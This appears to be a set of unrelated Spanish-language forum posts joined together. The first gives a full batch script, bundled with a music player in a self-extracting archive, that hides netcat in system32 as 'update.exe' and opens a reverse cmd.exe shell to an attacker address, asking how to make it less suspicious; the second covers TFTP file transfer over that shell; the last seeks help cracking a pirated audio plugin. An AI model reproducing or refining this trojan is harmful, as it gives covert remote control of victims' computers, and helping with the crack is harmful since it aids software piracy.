Soy bastante principiante si..

Antes de empezar quiero aclarar que todo me funciono, el problema es que al hacer doble click en el autoextraible, tarda como 5 segundos en hacer todo ,y queda sospechoso.


Hice un autoextraible SFX con el Winrar, en donde meti 3 programas:

- AIMP_2.10.exe
- netcat.exe
- instrucciones.exe

El AIMP es el reproductor de audio.
El archivo instrucciones.exe lo escribi en .bat y lo compile con el QuickBFC para que se ejecute en modo oculto (o ghost). Y dice:

---------
@echo off
copy netcat.exe %SystemRoot%\system32\update.exe
del netcat.exe
cd %SystemRoot%\system32
attrib +H +S update.exe
start /B %SystemRoot%\system32\update -d -e cmd.exe 192.168.1.101 8888
cd %HomeDrive%\tmp
start AIMP_2.10.exe
---------

Para eso yo desde mi maquina atacante ya estoy escuchando en el puerto 8888 . Y el auto-extraible lo abro desde una maquina victima en el VirtualBox.

Es decir que el auto-extraible lo que hace es descomprimir los archivos en una carpeta temporal (c:\tmp) y ejecutar el archivo "instrucciones.exe". Pero tarda como 5 segundos obtener la shell y recien abrir el AIMP_2.10.exe

Pero si yo en vez de abrir el auto-extraible , extraigo los archivos a una carpeta y ejecuto el "instrucciones.exe" , pasa todo en un instante.

Por lo que deduzco que el problema esta en el auto-extraible .. Queria consultarles si estoy errado, y si puedo hacer algo para agilizar el proceso

El tema es asi.

Tengo mi maquina (atacante, ip 192.168.1.101), y un VirtualBox (victima, ip 10.0.2.10), las dos con windows xp sp2. Hice shell inversa con el NETCAT , y obtuve la shell de la maquina victima .

Ahora yo quiero tranferir archivos por TFTP .
Instale el server TFTPd32 en mi maquina (atacante) y lo tengo andando. Ya configure la carpeta base, y en Security le di None.

En la carpeta base tengo un archivo "hola.txt" .
Introduzco la siguiente sentencia en la maquina victima por la shell que obtuve:

C:\> tftp -i 192.168.1.101 get hola.txt

y me termina diciendo Tiempo de espera agotado.

El log del tftpd32 me dice:

Connection received from 192.168.1.101 on port 1991 [20/02 13:34:09.046]
Read request for file <hola.txt>. Mode octet [20/02 13:34:09.046]
Using local port 1992 [20/02 13:34:09.046]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:09.093]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:10.078]
Read request for file <hola.txt>. Mode octet [20/02 13:34:10.078]
Using local port 1993 [20/02 13:34:10.078]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:10.140]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:12.140]
Read request for file <hola.txt>. Mode octet [20/02 13:34:12.140]
Using local port 1994 [20/02 13:34:12.140]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:12.187]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:16.234]
Read request for file <hola.txt>. Mode octet [20/02 13:34:16.234]
Using local port 1995 [20/02 13:34:16.234]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:16.296]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:24.296]
Read request for file <hola.txt>. Mode octet [20/02 13:34:24.296]
Using local port 1996 [20/02 13:34:24.296]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:24.343]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:32.343]
Read request for file <hola.txt>. Mode octet [20/02 13:34:32.343]
Using local port 2001 [20/02 13:34:32.343]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:32.406]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:40.390]
Read request for file <hola.txt>. Mode octet [20/02 13:34:40.406]
Using local port 2002 [20/02 13:34:40.406]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:40.453]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:48.453]
Read request for file <hola.txt>. Mode octet [20/02 13:34:48.453]
Using local port 2003 [20/02 13:34:48.453]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:48.500]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:56.500]
Unexpected request 5 from peer [20/02 13:34:56.500]
Returning EBADOP to Peer [20/02 13:34:56.500]



Alguien sabe que puede estar sucediendo?
Aclaro que tengo los firewall desactivados en las dos maquinas.

Buenas. Baje un programa, un secuenciador de baterias, es un plugin, archivo .dll
Se llama Guru. lo instale y busque el serial y anduvo perfecto pero ahora me salta el siguiente aviso "This GURU is using an illegal pirated serial number and has been deactivated, and your IP has been logged".
CREO, que fue a partir de que me registre en la pagina oficial para bajar el manual, un boludo si.
El tema es que estoy investigando pero no cazo una con el desensamblador. Si alguien tiene idea como seguir le agredeciera eternamente.
Aca adjunto una foto de hasta donde llegue con el Ollydbg, y por las dudas el .dll en cuestion.

Guru.dll  ->  http://www.mediafire.com/?tw7jilh4oc55i06



un Abrazo